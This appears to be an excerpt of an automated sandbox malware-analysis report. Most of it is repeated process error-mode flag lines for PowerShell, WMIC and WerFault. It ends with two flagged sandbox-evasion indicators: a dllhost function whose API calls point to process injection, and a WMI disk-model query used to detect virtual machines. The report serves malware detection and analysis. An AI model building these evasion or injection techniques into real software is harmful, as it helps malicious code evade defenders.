Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 41_2_0000000140001868
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
